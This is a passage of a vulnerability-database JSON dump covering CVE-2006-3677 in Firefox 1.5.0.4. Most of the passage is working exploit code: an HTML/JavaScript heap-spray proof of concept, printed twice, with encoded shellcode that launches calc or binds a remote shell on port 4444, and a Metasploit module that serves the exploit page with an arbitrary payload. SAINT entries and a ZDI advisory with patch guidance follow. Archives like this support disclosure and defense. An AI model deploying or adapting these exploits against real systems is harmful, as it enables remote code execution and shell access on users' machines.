"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9946/"}, {"lastseen": "2016-01-31T15:29:14", "description": "Mozilla Firefox. CVE-2006-3677. Remote exploits for multiple platform", "published": "2006-07-28T00:00:00", "type": "exploitdb", "title": "Mozilla Firefox <= 1.5.0.4 - Javascript Navigator Object Code Execution PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3677"], "modified": "2006-07-28T00:00:00", "id": "EDB-ID:2082", "href": "https://www.exploit-db.com/exploits/2082/", "sourceData": "<!--\r\nFirefox <= 1.5.0.4 Javascript navigator Object Code Execution PoC \r\nhttp://browserfun.blogspot.com/\r\n\r\nThe following bug (mfsa2006-45) was tested on the Firefox 1.5.0.4 running \r\non Windows 2000 SP4, Windows XP SP4, and a recently updated Gentoo Linux system. \r\nThis bug was reported by TippingPoint and fixed in the latest 1.5.0.5 release of \r\nMozilla Firefox. This is different from the bug I reported (mfsa2006-48) and is \r\ntrivial to turn into a working exploit. The demonstration link below will attempt \r\nto launch \"calc.exe\" on Windows systems and \"touch /tmp/METASPLOIT\" on Linux systems.\r\n\r\nwindow.navigator = (0x01020304 / 2);\r\njava.lang.reflect.Runtime.newInstance( java.lang.Class.forName(\"java.lang.Runtime\"), 0);\r\n\r\n-->\r\n\r\n<html><body><script>\r\n\r\n// MoBB Demonstration\r\nfunction Demo() {\r\n\r\n\t// Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html\r\n\t// https://bugzilla.mozilla.org/show_bug.cgi?id=342267\r\n\t// CVE-2006-3677\r\n\r\n\t// The Java plugin is required for this to work\r\n\r\n\t// win32 = calc.exe\r\n\tvar shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065');\r\n\tvar fill_win32 = unescape('%u0800');\r\n\tvar addr_win32 = 0x08000800;\r\n\t\r\n\t// linux = touch /tmp/METASPLOIT (unreliable)\r\n\tvar shellcode_linux = unescape('%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080');\r\n\tvar fill_linux = unescape('%ua8a8');\r\n\tvar addr_linux = -0x58000000; // Integer wrap: 0xa8000000\r\n\r\n\t// mac os x ppc = bind a shell to 4444\r\n\tvar shellcode_macppc = unescape('%u3860%u0002%u3880%u0001%u38a0%u0006%u3800%u0061%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u4800%u000d%u0002%u115c%u0000%u0000%u7c88%u02a6%u38a0%u0010%u3800%u0068%u7fc3%uf378%u4400%u0002%u7c00%u0278%u3800%u006a%u7fc3%uf378%u4400%u0002%u7c00%u0278%u7fc3%uf378%u3800%u001e%u3880%u0010%u9081%uffe8%u38a1%uffe8%u3881%ufff0%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u38a0%u0002%u3800%u005a%u7fc3%uf378%u7ca4%u2b78%u4400%u0002%u7c00%u0278%u38a5%uffff%u2c05%uffff%u4082%uffe5%u3800%u0042%u4400%u0002%u7c00%u0278%u7ca5%u2a79%u4082%ufffd%u7c68%u02a6%u3863%u0028%u9061%ufff8%u90a1%ufffc%u3881%ufff8%u3800%u003b%u7c00%u04ac%u4400%u0002%u7c00%u0278%u7fe0%u0008%u2f62%u696e%u2f63%u7368%u0000%u0000');\r\n\tvar fill_macppc = unescape('%u0c0c');\r\n\tvar addr_macppc = 0x0c000000;\r\n\t\r\n\t// mac os x intel = bind a shell to 4444\r\n\t// Thanks to nemo[at]felinemenace.org for shellcode\r\n\t// Thanks to Todd Manning for the target information and testing\r\n\tvar shellcode_macx86 = unescape('%u426a%ucd58%u6a80%u5861%u5299%u1068%u1102%u895c%u52e1%u5242%u5242%u106a%u80cd%u9399%u5351%u6a52%u5868%u80cd%u6ab0%u80cd%u5352%ub052%ucd1e%u9780%u026a%u6a59%u585a%u5751%ucd51%u4980%u890f%ufff1%uffff%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5353%u3bb0%u80cd');\r\n\tvar fill_macx86 = unescape('%u1c1c');\r\n\tvar addr_macx86 = 0x1c000000;\t\t\r\n\r\n\r\n\t// Start the browser detection\r\n\tvar shellcode;\r\n\tvar addr;\r\n\tvar fill;\r\n\tvar ua = '' + navigator.userAgent;\r\n\r\n\tif (ua.indexOf('Linux') != -1) {\r\n\t\talert('Trying to create /tmp/METASPLOIT');\r\n\t\tshellcode = shellcode_linux;\r\n\t\taddr = addr_linux;\r\n\t\tfill = fill_linux;\r\n\t}\r\n\t\r\n\tif (ua.indexOf('Windows') != -1) {\r\n\t\talert('Trying to launch Calculator');\t\r\n\t\tshellcode = shellcode_win32;\r\n\t\taddr = addr_win32;\r\n\t\tfill = fill_win32;\r\n\t}\t\r\n\r\n\tif (ua.indexOf('PPC Mac OS') != -1) {\r\n\t\talert('Trying to bind a shell to 4444');\r\n\t\tshellcode = shellcode_macppc;\r\n\t\taddr = addr_macppc;\r\n\t\tfill = fill_macppc;\r\n\t}\t\r\n\t\r\n\tif (ua.indexOf('Intel Mac OS') != -1) {\r\n\t\talert('Trying to bind a shell to 4444');\r\n\t\tshellcode = shellcode_macx86;\r\n\t\taddr = addr_macx86;\r\n\t\tfill = fill_macx86;\r\n\t}\r\n\t\t\t\r\n\tif (! shellcode) {\r\n\t\talert('OS not supported, only attempting a crash!');\r\n\t\tshellcode = unescape('%ucccc');\r\n\t\tfill = unescape('%ucccc');\r\n\t\taddr = 0x02020202;\r\n\t}\r\n\t\t\r\n\tvar b = fill;\r\n\twhile (b.length <= 0x400000) b+=b;\r\n\r\n\tvar c = new Array();\r\n\tfor (var i =0; i<36; i++) {\r\n\t\tc[i] = \r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode +\r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode + \r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode + \r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode;\r\n\t}\r\n\t\t\t\r\n\t\r\n\tif (window.navigator.javaEnabled) {\r\n\t\twindow.navigator = (addr / 2);\r\n\t\ttry {\r\n\t\t\tjava.lang.reflect.Runtime.newInstance(\r\n\t\t\t\tjava.lang.Class.forName(\"java.lang.Runtime\"), 0\r\n\t\t\t);\r\n\t\t\talert('Patched!');\r\n\t\t}catch(e){\r\n\t\t\talert('No Java plugin installed!');\r\n\t\t}\r\n\t}\r\n}\r\n\r\n</script>\r\n\r\nClicking the button below may crash your browser!<br><br>\r\n<input type='button' onClick='Demo()' value='Start Demo!'>\r\n\r\n\r\n</body></html>\r\n\r\n# milw0rm.com [2006-07-28]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2082/"}, {"lastseen": "2016-02-01T23:32:59", "description": "Mozilla Suite/Firefox Navigator Object Code Execution. CVE-2006-3677. Remote exploits for multiple platform", "published": "2010-09-20T00:00:00", "type": "exploitdb", "title": "Mozilla Suite/Firefox Navigator Object Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3677"], "modified": "2010-09-20T00:00:00", "id": "EDB-ID:16300", "href": "https://www.exploit-db.com/exploits/16300/", "sourceData": "##\r\n# $Id: mozilla_navigatorjava.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core/constants'\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tinclude Msf::Exploit::Remote::BrowserAutopwn\r\n\tautopwn_info({\r\n\t\t:ua_name => HttpClients::FF,\r\n\t\t:javascript => true,\r\n\t\t:rank => NormalRanking, # reliable memory corruption\r\n\t\t:vuln_test => %Q|\r\n\t\t\tis_vuln = false;\r\n\t\t\tif (window.navigator.javaEnabled && window.navigator.javaEnabled()){\r\n\t\t\t\tis_vuln = true;\r\n\t\t\t}\r\n\t\t\t|,\r\n\t})\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Mozilla Suite/Firefox Navigator Object Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a code execution vulnerability in the Mozilla\r\n\t\t\t\tSuite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit\r\n\t\t\t\trequires the Java plugin to be installed.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => ['hdm'],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2006-3677'],\r\n\t\t\t\t\t['OSVDB', '27559'],\r\n\t\t\t\t\t['BID', '19192'],\r\n\t\t\t\t\t['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html'],\r\n\t\t\t\t\t['URL', 'http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html'],\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\",\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Firefox 1.5.0.4 Windows x86',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Ret' => 0x08000800,\r\n\t\t\t\t\t\t\t'Fill' => \"%u0800\",\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Firefox 1.5.0.4 Linux x86',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Ret' => -0x58000000,\r\n\t\t\t\t\t\t\t'Fill' => \"%ua8a8\",\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Firefox 1.5.0.4 Mac OS X PPC',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_PPC,\r\n\t\t\t\t\t\t\t'Ret' => 0x0c000000,\r\n\t\t\t\t\t\t\t'Fill' => \"%u0c0c\",\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Firefox 1.5.0.4 Mac OS X x86',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Ret' => 0x1c000000,\r\n\t\t\t\t\t\t\t'Fill' => \"%u1c1c\",\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jul 25 2006'\r\n\t\t\t))\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\t# Re-generate the payload\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\t\tsend_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\n\tdef generate_html(payload)\r\n\r\n\t\tenc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\treturn %Q|\r\n<html><head>\r\n<script>\r\n\tfunction Exploit() {\r\n\t\tif (window.navigator.javaEnabled) {\r\n\t\t\tvar shellcode = unescape(\"#{enc_code}\");\r\n\t\t\tvar b = unescape(\"#{target['Fill']}\");\r\n\t\t\twhile (b.length <= 0x400000) b+=b;\r\n\r\n\t\t\tvar c = new Array();\r\n\t\t\tfor (var i =0; i<36; i++) {\r\n\t\t\t\tc[i] =\r\n\t\t\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode +\r\n\t\t\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode +\r\n\t\t\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode +\r\n\t\t\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode;\r\n\t\t\t}\r\n\r\n\t\t\twindow.navigator = (#{target['Ret']} / 2);\r\n\t\t\ttry {\r\n\t\t\t\tjava.lang.reflect.Runtime.newInstance(\r\n\t\t\t\t\tjava.lang.Class.forName(\"java.lang.Runtime\"), 0\r\n\t\t\t\t);\r\n\t\t\t}catch(e){\r\n\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n</script>\r\n</head><body onload='Exploit()'>Please wait...</body></html>\r\n\t\t|\r\n\tend\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16300/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:35", "description": "\nMozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution", "edition": 1, "published": "2006-07-28T00:00:00", "title": "Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3677"], "modified": "2006-07-28T00:00:00", "id": "EXPLOITPACK:1E20BAC8585C2DDCEF589D2071DD8186", "href": "", "sourceData": "<!--\nFirefox <= 1.5.0.4 Javascript navigator Object Code Execution PoC \nhttp://browserfun.blogspot.com/\n\nThe following bug (mfsa2006-45) was tested on the Firefox 1.5.0.4 running \non Windows 2000 SP4, Windows XP SP4, and a recently updated Gentoo Linux system. \nThis bug was reported by TippingPoint and fixed in the latest 1.5.0.5 release of \nMozilla Firefox. This is different from the bug I reported (mfsa2006-48) and is \ntrivial to turn into a working exploit. The demonstration link below will attempt \nto launch \"calc.exe\" on Windows systems and \"touch /tmp/METASPLOIT\" on Linux systems.\n\nwindow.navigator = (0x01020304 / 2);\njava.lang.reflect.Runtime.newInstance( java.lang.Class.forName(\"java.lang.Runtime\"), 0);\n\n-->\n\n<html><body><script>\n\n// MoBB Demonstration\nfunction Demo() {\n\n\t// Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html\n\t// https://bugzilla.mozilla.org/show_bug.cgi?id=342267\n\t// CVE-2006-3677\n\n\t// The Java plugin is required for this to work\n\n\t// win32 = calc.exe\n\tvar shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065');\n\tvar fill_win32 = unescape('%u0800');\n\tvar addr_win32 = 0x08000800;\n\t\n\t// linux = touch /tmp/METASPLOIT (unreliable)\n\tvar shellcode_linux = unescape('%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080');\n\tvar fill_linux = unescape('%ua8a8');\n\tvar addr_linux = -0x58000000; // Integer wrap: 0xa8000000\n\n\t// mac os x ppc = bind a shell to 4444\n\tvar shellcode_macppc = unescape('%u3860%u0002%u3880%u0001%u38a0%u0006%u3800%u0061%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u4800%u000d%u0002%u115c%u0000%u0000%u7c88%u02a6%u38a0%u0010%u3800%u0068%u7fc3%uf378%u4400%u0002%u7c00%u0278%u3800%u006a%u7fc3%uf378%u4400%u0002%u7c00%u0278%u7fc3%uf378%u3800%u001e%u3880%u0010%u9081%uffe8%u38a1%uffe8%u3881%ufff0%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u38a0%u0002%u3800%u005a%u7fc3%uf378%u7ca4%u2b78%u4400%u0002%u7c00%u0278%u38a5%uffff%u2c05%uffff%u4082%uffe5%u3800%u0042%u4400%u0002%u7c00%u0278%u7ca5%u2a79%u4082%ufffd%u7c68%u02a6%u3863%u0028%u9061%ufff8%u90a1%ufffc%u3881%ufff8%u3800%u003b%u7c00%u04ac%u4400%u0002%u7c00%u0278%u7fe0%u0008%u2f62%u696e%u2f63%u7368%u0000%u0000');\n\tvar fill_macppc = unescape('%u0c0c');\n\tvar addr_macppc = 0x0c000000;\n\t\n\t// mac os x intel = bind a shell to 4444\n\t// Thanks to nemo[at]felinemenace.org for shellcode\n\t// Thanks to Todd Manning for the target information and testing\n\tvar shellcode_macx86 = unescape('%u426a%ucd58%u6a80%u5861%u5299%u1068%u1102%u895c%u52e1%u5242%u5242%u106a%u80cd%u9399%u5351%u6a52%u5868%u80cd%u6ab0%u80cd%u5352%ub052%ucd1e%u9780%u026a%u6a59%u585a%u5751%ucd51%u4980%u890f%ufff1%uffff%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5353%u3bb0%u80cd');\n\tvar fill_macx86 = unescape('%u1c1c');\n\tvar addr_macx86 = 0x1c000000;\t\t\n\n\n\t// Start the browser detection\n\tvar shellcode;\n\tvar addr;\n\tvar fill;\n\tvar ua = '' + navigator.userAgent;\n\n\tif (ua.indexOf('Linux') != -1) {\n\t\talert('Trying to create /tmp/METASPLOIT');\n\t\tshellcode = shellcode_linux;\n\t\taddr = addr_linux;\n\t\tfill = fill_linux;\n\t}\n\t\n\tif (ua.indexOf('Windows') != -1) {\n\t\talert('Trying to launch Calculator');\t\n\t\tshellcode = shellcode_win32;\n\t\taddr = addr_win32;\n\t\tfill = fill_win32;\n\t}\t\n\n\tif (ua.indexOf('PPC Mac OS') != -1) {\n\t\talert('Trying to bind a shell to 4444');\n\t\tshellcode = shellcode_macppc;\n\t\taddr = addr_macppc;\n\t\tfill = fill_macppc;\n\t}\t\n\t\n\tif (ua.indexOf('Intel Mac OS') != -1) {\n\t\talert('Trying to bind a shell to 4444');\n\t\tshellcode = shellcode_macx86;\n\t\taddr = addr_macx86;\n\t\tfill = fill_macx86;\n\t}\n\t\t\t\n\tif (! shellcode) {\n\t\talert('OS not supported, only attempting a crash!');\n\t\tshellcode = unescape('%ucccc');\n\t\tfill = unescape('%ucccc');\n\t\taddr = 0x02020202;\n\t}\n\t\t\n\tvar b = fill;\n\twhile (b.length <= 0x400000) b+=b;\n\n\tvar c = new Array();\n\tfor (var i =0; i<36; i++) {\n\t\tc[i] = \n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode +\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode + \n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode + \n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode;\n\t}\n\t\t\t\n\t\n\tif (window.navigator.javaEnabled) {\n\t\twindow.navigator = (addr / 2);\n\t\ttry {\n\t\t\tjava.lang.reflect.Runtime.newInstance(\n\t\t\t\tjava.lang.Class.forName(\"java.lang.Runtime\"), 0\n\t\t\t);\n\t\t\talert('Patched!');\n\t\t}catch(e){\n\t\t\talert('No Java plugin installed!');\n\t\t}\n\t}\n}\n\n</script>\n\nClicking the button below may crash your browser!<br><br>\n<input type='button' onClick='Demo()' value='Start Demo!'>\n\n\n</body></html>\n\n# milw0rm.com [2006-07-28]", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "saint": [{"lastseen": "2019-05-29T17:19:55", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3677"], "edition": 2, "description": "Added: 08/14/2006 \nCVE: [CVE-2006-3677](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3677>) \nBID: [19192](<http://www.securityfocus.com/bid/19192>) \nOSVDB: [27559](<http://www.osvdb.org/27559>) \n\n\n### Background\n\nWhen used in a web page, Java references properties of the `**window.navigator**` object as it starts up in Firefox or SeaMonkey. \n\n### Problem\n\nIf a web page replaces the navigator object before starting Java, then the page could cause the browser to crash in a way that allows arbitrary command execution. \n\n### Resolution\n\nUpgrade to [Firefox](<http://www.mozilla.com/firefox/>) 1.5.0.5 or higher or [SeaMonkey](<http://www.mozilla.org/projects/seamonkey/>) 1.0.3 or higher. \n\n### References\n\n<http://www.mozilla.org/security/announce/2006/mfsa2006-45.html> \n\n\n### Limitations\n\nExploit works on Firefox 1.5.0.4 and requires a user to click on the _Exploit_ button. The Java plug-in must be installed in order for the exploit to succeed. Firefox's automatic update feature must be disabled in order for the exploit to succeed. Note that it may take several minutes for this exploit to succeed because a large amount of memory must be allocated on the target. \n\n### Platforms\n\nWindows 2000 \nWindows XP SP2 \nLinux \nUbuntu Linux \n \n\n", "modified": "2006-08-14T00:00:00", "published": "2006-08-14T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/firefox_navigator", "id": "SAINT:CE5429426532AF5F968BB29962C53BED", "type": "saint", "title": "Mozilla Firefox JavaScript Navigator object vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3677"], "description": "Added: 08/14/2006 \nCVE: [CVE-2006-3677](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3677>) \nBID: [19192](<http://www.securityfocus.com/bid/19192>) \nOSVDB: [27559](<http://www.osvdb.org/27559>) \n\n\n### Background\n\nWhen used in a web page, Java references properties of the `**window.navigator**` object as it starts up in Firefox or SeaMonkey. \n\n### Problem\n\nIf a web page replaces the navigator object before starting Java, then the page could cause the browser to crash in a way that allows arbitrary command execution. \n\n### Resolution\n\nUpgrade to [Firefox](<http://www.mozilla.com/firefox/>) 1.5.0.5 or higher or [SeaMonkey](<http://www.mozilla.org/projects/seamonkey/>) 1.0.3 or higher. \n\n### References\n\n<http://www.mozilla.org/security/announce/2006/mfsa2006-45.html> \n\n\n### Limitations\n\nExploit works on Firefox 1.5.0.4 and requires a user to click on the _Exploit_ button. The Java plug-in must be installed in order for the exploit to succeed. Firefox's automatic update feature must be disabled in order for the exploit to succeed. Note that it may take several minutes for this exploit to succeed because a large amount of memory must be allocated on the target. \n\n### Platforms\n\nWindows 2000 \nWindows XP SP2 \nLinux \nUbuntu Linux \n \n\n", "edition": 1, "modified": "2006-08-14T00:00:00", "published": "2006-08-14T00:00:00", "id": "SAINT:F418B910FA3ECE9C21E8C86176E3EFA2", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/firefox_navigator", "type": "saint", "title": "Mozilla Firefox JavaScript Navigator object vulnerability", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-06-04T23:19:40", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3677"], "description": "Added: 08/14/2006 \nCVE: [CVE-2006-3677](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3677>) \nBID: [19192](<http://www.securityfocus.com/bid/19192>) \nOSVDB: [27559](<http://www.osvdb.org/27559>) \n\n\n### Background\n\nWhen used in a web page, Java references properties of the `**window.navigator**` object as it starts up in Firefox or SeaMonkey. \n\n### Problem\n\nIf a web page replaces the navigator object before starting Java, then the page could cause the browser to crash in a way that allows arbitrary command execution. \n\n### Resolution\n\nUpgrade to [Firefox](<http://www.mozilla.com/firefox/>) 1.5.0.5 or higher or [SeaMonkey](<http://www.mozilla.org/projects/seamonkey/>) 1.0.3 or higher. \n\n### References\n\n<http://www.mozilla.org/security/announce/2006/mfsa2006-45.html> \n\n\n### Limitations\n\nExploit works on Firefox 1.5.0.4 and requires a user to click on the _Exploit_ button. The Java plug-in must be installed in order for the exploit to succeed. Firefox's automatic update feature must be disabled in order for the exploit to succeed. Note that it may take several minutes for this exploit to succeed because a large amount of memory must be allocated on the target. \n\n### Platforms\n\nWindows 2000 \nWindows XP SP2 \nLinux \nUbuntu Linux \n \n\n", "edition": 4, "modified": "2006-08-14T00:00:00", "published": "2006-08-14T00:00:00", "id": "SAINT:CB14DECB4D8D823D0EF957FA3E48318C", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/firefox_navigator", "title": "Mozilla Firefox JavaScript Navigator object vulnerability", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "cvelist": ["CVE-2006-3677"], "description": "ZDI-06-025: Mozilla Firefox Javascript navigator Object Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-06-025.html\r\nJuly 26, 2006\r\n\r\n-- CVE ID:\r\nCVE-2006-3677\r\n\r\n-- Affected Vendor:\r\nMozilla\r\n\r\n-- Affected Products:\r\nFirefox 1.5.0 - 1.5.0.4\r\nSeaMonkey 1.0 - 1.0.2\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability since July 26, 2006 by Digital Vaccine protection\r\nfilter ID 4326. For further product information on the TippingPoint IPS:\r\n\r\n http://www.tippingpoint.com \r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows attackers to execute arbitrary code on\r\nvulnerable installations of the Mozilla Firefox web browser. User\r\ninteraction is required to exploit this vulnerability in that the\r\ntarget must visit a malicious page.\r\n\r\nThe flaw exists when assigning specific values to the window.navigator\r\nobject. A lack of checking on assignment causes user supplied data to\r\nbe later used in the creation of other objects leading to eventual code\r\nexecution.\r\n\r\n-- Vendor Response:\r\nMozilla has addressed this issue in the latest versions of the affected\r\nproduct. More information is detailed in MFSA2006-45:\r\n\r\n http://www.mozilla.org/security/announce/2006/mfsa2006-45.html\r\n\r\n-- Disclosure Timeline:\r\n2006.06.16 - Vulnerability reported to vendor\r\n2006.07.25 - Vulnerability information provided to ZDI security partners\r\n2006.07.26 - Digital Vaccine released to TippingPoint customers\r\n2006.07.26 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by an anonymous researcher.\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, a division of 3Com, The Zero Day Initiative\r\n(ZDI) represents a best-of-breed model for rewarding security\r\nresearchers for responsibly disclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is used.\r\n3Com does not re-sell the vulnerability details or any exploit code.\r\nInstead, upon notifying the affected product vendor, 3Com provides its\r\ncustomers with zero day protection through its intrusion prevention\r\ntechnology. Explicit details regarding the specifics of the\r\nvulnerability are not exposed to any parties until an official vendor\r\npatch is publicly available. Furthermore, with the altruistic aim of\r\nhelping to secure a broader user base, 3Com provides this vulnerability\r\ninformation confidentially to security vendors (including competitors)\r\nwho have a vulnerability protection or mitigation product.\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "modified": "2006-07-27T00:00:00", "published": "2006-07-27T00:00:00", "id": "SECURITYVULNS:DOC:13641", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13641", "title": "[Full-disclosure] ZDI-06-025: Mozilla Firefox Javascript navigator Object Vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "cvelist": ["CVE-2006-3677"], "description": "Description:\r\nThe newest versions of Netscape, K-Meleon and Flock browsers are affected to JavaScript navigator vulnerability described in http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html and Mozilla Foundation Security Advisory 2006-45.\r\n\r\nWhen method used in a web page Java would reference properties of the window.navigator object as it started up causing browsers to crash or switch to Not Responding state.\r\n\r\nTest 